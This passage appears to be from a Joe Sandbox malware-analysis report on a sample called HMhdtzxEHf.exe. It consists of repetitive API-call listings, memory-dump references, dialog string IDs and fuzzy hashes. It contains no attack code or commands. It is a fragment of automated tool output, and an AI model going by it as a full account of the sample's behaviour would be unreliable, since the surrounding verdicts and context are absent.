                                                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 00A4D684
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemText$DialogWindow
                                                                                            • String ID: RENAMEDLG
                                                                                            • API String ID: 445417207-3299779563
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A57E24,00000000,?,00A57DC4,00000000,00A6C300,0000000C,00A57F1B,00000000,00000002), ref: 00A57E93
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A57EA6
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A57E24,00000000,?,00A57DC4,00000000,00A6C300,0000000C,00A57F1B,00000000,00000002), ref: 00A57EC9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            APIs
                                                                                              • Part of subcall function 00A4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
                                                                                              • Part of subcall function 00A4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858
                                                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A3F2E4
                                                                                            • GetProcAddress.KERNEL32(00A781C8,CryptUnprotectMemory), ref: 00A3F2F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                            • API String ID: 2141747552-1753850145
                                                                                            • Opcode ID: 07bf4e3d53dd03045b02a044e576cec05bbb4bafb7165c380beba12a76e791b5
                                                                                            • Instruction ID: e63cabf037f14114c0c71698a41b24b1f370ca00f4844991d23aafe3fb726ca0
                                                                                            • Opcode Fuzzy Hash: 07bf4e3d53dd03045b02a044e576cec05bbb4bafb7165c380beba12a76e791b5
                                                                                            • Instruction Fuzzy Hash: 94E04F76924702AECF219BB49949B42BAF46F24740F14881DF0DB93680DAB5D5429B50
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustPointer$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 2252061734-0
                                                                                            • Opcode ID: 8946dc18ce6e033f656794d9e7328ff5bfbd74504f2857c38df8ac24181b2ea3
                                                                                            • Instruction ID: 7083c9166b33f1f8a73bef69018d00527a4fc34cf2cb5d97fcb2418123764144
                                                                                            • Opcode Fuzzy Hash: 8946dc18ce6e033f656794d9e7328ff5bfbd74504f2857c38df8ac24181b2ea3
                                                                                            • Instruction Fuzzy Hash: B251E173600212AFDB298F14D945BBA77B4FF56312F24452DEC06476A2E731ED88D790
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00A5BF39
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A5BF5C
                                                                                              • Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A5BF82
                                                                                            • _free.LIBCMT ref: 00A5BF95
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A5BFA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: 0efa27af7123bed1eae09394ef59bcb36aee646b81e6017a0a983ef9e2baf378
                                                                                            • Instruction ID: c6fd3073d4c3db05e69a4814312585379d0a41aa31d5e1c74b4ad06327f28366
                                                                                            • Opcode Fuzzy Hash: 0efa27af7123bed1eae09394ef59bcb36aee646b81e6017a0a983ef9e2baf378
                                                                                            • Instruction Fuzzy Hash: 92015EB26256157F2B2156A65C49C7B6A7DFAC3BA33140229FD05D2141EB70CD0A95B0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,?,00A591AD,00A5B188,?,00A59813,00000001,00000364,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A5986E
                                                                                            • _free.LIBCMT ref: 00A598A3
                                                                                            • _free.LIBCMT ref: 00A598CA
                                                                                            • SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A598D7
                                                                                            • SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A598E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: 4602bd4314ff79349fead3108a6157ec678f47687a16411025e2e4f6a2ade4f9
                                                                                            • Instruction ID: b0eb2aaf1d08bb3177f89006573c5f1830d2302f256b22f851c1922019bb4a2b
                                                                                            • Opcode Fuzzy Hash: 4602bd4314ff79349fead3108a6157ec678f47687a16411025e2e4f6a2ade4f9
                                                                                            • Instruction Fuzzy Hash: C101F437244701FBC612A7A46D8595B25BAFFE37737210134FD19AA192EF748C0F5261
                                                                                            APIs
                                                                                              • Part of subcall function 00A411CF: ResetEvent.KERNEL32(?), ref: 00A411E1
                                                                                              • Part of subcall function 00A411CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A411F5
                                                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A40F21
                                                                                            • CloseHandle.KERNEL32(?,?), ref: 00A40F3B
                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00A40F54
                                                                                            • CloseHandle.KERNEL32(?), ref: 00A40F60
                                                                                            • CloseHandle.KERNEL32(?), ref: 00A40F6C
                                                                                              • Part of subcall function 00A40FE4: WaitForSingleObject.KERNEL32(?,000000FF,00A41206,?), ref: 00A40FEA
                                                                                              • Part of subcall function 00A40FE4: GetLastError.KERNEL32(?), ref: 00A40FF6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                            • String ID:
                                                                                            • API String ID: 1868215902-0
                                                                                            • Opcode ID: 0b8428deb76b75b5606b960dec121ab65212a9f5bcde9cb9a0d6de9b4be4e7d0
                                                                                            • Instruction ID: ac3cd8e30559c1e3052dc408bf67659f28ab01cb81a5d668d59411b558915c1d
                                                                                            • Opcode Fuzzy Hash: 0b8428deb76b75b5606b960dec121ab65212a9f5bcde9cb9a0d6de9b4be4e7d0
                                                                                            • Instruction Fuzzy Hash: 1D015276100744FFCB229BA4DD84FC6BBB9FB48710F004929F25B52160C7B57A5ADB50
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00A5C817
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A5C829
                                                                                            • _free.LIBCMT ref: 00A5C83B
                                                                                            • _free.LIBCMT ref: 00A5C84D
                                                                                            • _free.LIBCMT ref: 00A5C85F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 3e5d9eb28b3fd18537b8c33d3738f6c7bc3a01471ba9e7e3c63d0c9216700299
                                                                                            • Instruction ID: 9e8119fd135bbfc8d144ce3538472b8f6ed7a07ffdf27700212aa056fb387b81
                                                                                            • Opcode Fuzzy Hash: 3e5d9eb28b3fd18537b8c33d3738f6c7bc3a01471ba9e7e3c63d0c9216700299
                                                                                            • Instruction Fuzzy Hash: 86F01D33504304BFC620EBA8F986C1A73F9FA10B267641819F908E7556CFB5FC89CA64
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00A41FE5
                                                                                            • _wcslen.LIBCMT ref: 00A41FF6
                                                                                            • _wcslen.LIBCMT ref: 00A42006
                                                                                            • _wcslen.LIBCMT ref: 00A42014
                                                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00A3B371,?,?,00000000,?,?,?), ref: 00A4202F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$CompareString
                                                                                            • String ID:
                                                                                            • API String ID: 3397213944-0
                                                                                            • Opcode ID: bb7a95d520a15363a1860fc844ee417261fb7f3c2cb63895601bc809251c426d
                                                                                            • Instruction ID: ee9a1055c6e4b5b64a61c054be8800537aa2fd6f0bacb8b7067d213db8f8fdab
                                                                                            • Opcode Fuzzy Hash: bb7a95d520a15363a1860fc844ee417261fb7f3c2cb63895601bc809251c426d
                                                                                            • Instruction Fuzzy Hash: DEF01D33408014BBCF225F91EC0AECA7FA6EBC47A1B118415FE1A5B061CB729A65D790
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00A5891E
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A58930
                                                                                            • _free.LIBCMT ref: 00A58943
                                                                                            • _free.LIBCMT ref: 00A58954
                                                                                            • _free.LIBCMT ref: 00A58965
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 1cab0000497ef747763ce9ec309d66d603dc95d8e04b62cb1131347477e24d2d
                                                                                            • Instruction ID: e8f11ca1d340db5a2d61956db6089867d26af25e0b57bbff28ab4c6b8cb3bc5e
                                                                                            • Opcode Fuzzy Hash: 1cab0000497ef747763ce9ec309d66d603dc95d8e04b62cb1131347477e24d2d
                                                                                            • Instruction Fuzzy Hash: 35F03A76A11126ABC706EF94FD025453BF1F7247113000507F914662B2DF7A494BDB81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _swprintf
                                                                                            • String ID: %ls$%s: %s
                                                                                            • API String ID: 589789837-2259941744
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\HMhdtzxEHf.exe,00000104), ref: 00A57FAE
                                                                                            • _free.LIBCMT ref: 00A58079
                                                                                            • _free.LIBCMT ref: 00A58083
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                            • API String ID: 2506810119-2306939241
                                                                                            APIs
                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A531FB
                                                                                            • _abort.LIBCMT ref: 00A53306
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: EncodePointer_abort
                                                                                            • String ID: MOC$RCC
                                                                                            • API String ID: 948111806-2084237596
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A37406
                                                                                              • Part of subcall function 00A33BBA: __EH_prolog.LIBCMT ref: 00A33BBF
                                                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00A374CD
                                                                                              • Part of subcall function 00A37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A37AAB
                                                                                              • Part of subcall function 00A37A9C: GetLastError.KERNEL32 ref: 00A37AF1
                                                                                              • Part of subcall function 00A37A9C: CloseHandle.KERNEL32(?), ref: 00A37B00
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                            • API String ID: 3813983858-639343689
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4AD98
                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A4ADAD
                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A4ADC2
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ItemText$DialogWindow
                                                                                            • String ID: ASKNEXTVOL
                                                                                            • API String ID: 445417207-3402441367
                                                                                            APIs
                                                                                            • __fprintf_l.LIBCMT ref: 00A3D954
                                                                                            • _strncpy.LIBCMT ref: 00A3D99A
                                                                                              • Part of subcall function 00A41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A71030,00000200,00A3D928,00000000,?,00000050,00A71030), ref: 00A41DC4
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                            • String ID: $%s$@%s
                                                                                            • API String ID: 562999700-834177443
                                                                                            APIs
                                                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A3AC5A,00000008,?,00000000,?,00A3D22D,?,00000000), ref: 00A40E85
                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A3AC5A,00000008,?,00000000,?,00A3D22D,?,00000000), ref: 00A40E8F
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A3AC5A,00000008,?,00000000,?,00A3D22D,?,00000000), ref: 00A40E9F
                                                                                            Strings
                                                                                            • Thread pool initialization failed., xrefs: 00A40EB7
                                                                                            Similarity
                                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                            • String ID: Thread pool initialization failed.
                                                                                            • API String ID: 3340455307-2182114853
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4B2BE
                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00A4B2D6
                                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A4B304
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ItemText$DialogWindow
                                                                                            • String ID: GETPASSWORD1
                                                                                            • API String ID: 445417207-3292211884
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                            • API String ID: 0-56093855
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: __alldvrm$_strrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1036877536-0
                                                                                            • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                            • Instruction ID: 0f28ac73749d30141b6ca684ca72cd901d91e2f9e5bb1548a9cd56a61ef89b5c
                                                                                            • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                            • Instruction Fuzzy Hash: E7A11272A04786DFEB21CF28C9917AFBBE5FF55311F28416DE9859F282C2388949C750
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00A37F69,?,?,?), ref: 00A3A3FA
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00A37F69,?), ref: 00A3A43E
                                                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00A37F69,?,?,?,?,?,?,?), ref: 00A3A4BF
                                                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,00A37F69,?,?,?,?,?,?,?,?,?,?), ref: 00A3A4C6
                                                                                            Similarity
                                                                                            • API ID: File$Create$CloseHandleTime
                                                                                            • String ID:
                                                                                            • API String ID: 2287278272-0
                                                                                            • Opcode ID: 593feb6c086a3757429c4b34f414bb5f2899a58e732d54fce1bf8877def77c86
                                                                                            • Instruction ID: 590ffb71f812c76e7d0c3c705dc0e60a1d80de81b79d42297e5705d582ece6f6
                                                                                            • Opcode Fuzzy Hash: 593feb6c086a3757429c4b34f414bb5f2899a58e732d54fce1bf8877def77c86
                                                                                            • Instruction Fuzzy Hash: 4941FD31288391AAE721DF24DC45FAEBBE8AFA0300F04091CF5E097180C6A4AA4CDB53
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 176396367-0
                                                                                            • Opcode ID: 34b36bb1343aa5a99964eff089a23077553e84dd0cdde6b0d3ad0688b04e2289
                                                                                            • Instruction ID: ca7395c4ee9c85b8d91c78557b43ff6b83d691bd4dfc24a79fc7e3c6ad5484ea
                                                                                            • Opcode Fuzzy Hash: 34b36bb1343aa5a99964eff089a23077553e84dd0cdde6b0d3ad0688b04e2289
                                                                                            • Instruction Fuzzy Hash: FC41DA71A006655BCB11DFA88D0A9DFBBB8EF40311F00002AFD46F7245DF34AE498BA4
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00A591E0,?,00000000,?,00000001,?,?,00000001,00A591E0,?), ref: 00A5C9D5
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A5CA5E
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A56CBE,?), ref: 00A5CA70
                                                                                            • __freea.LIBCMT ref: 00A5CA79
                                                                                              • Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                            • String ID:
                                                                                            • API String ID: 2652629310-0
                                                                                            • Opcode ID: 5b341706931a2c86f33e1f502de331083118974bbc347be64f0394f4eaa39ea8
                                                                                            • Instruction ID: 44e567c06a211345c8d367c45e24700bab55c958c3c79f3c58adecf9d1d26f3c
                                                                                            • Opcode Fuzzy Hash: 5b341706931a2c86f33e1f502de331083118974bbc347be64f0394f4eaa39ea8
                                                                                            • Instruction Fuzzy Hash: 0331CD32A0021AAFDF24CF64DC41EAE7BA6FB41361B044228FD04E7255EB35DD59CBA0
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 00A4A666
                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A4A675
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A4A683
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00A4A691
                                                                                            Similarity
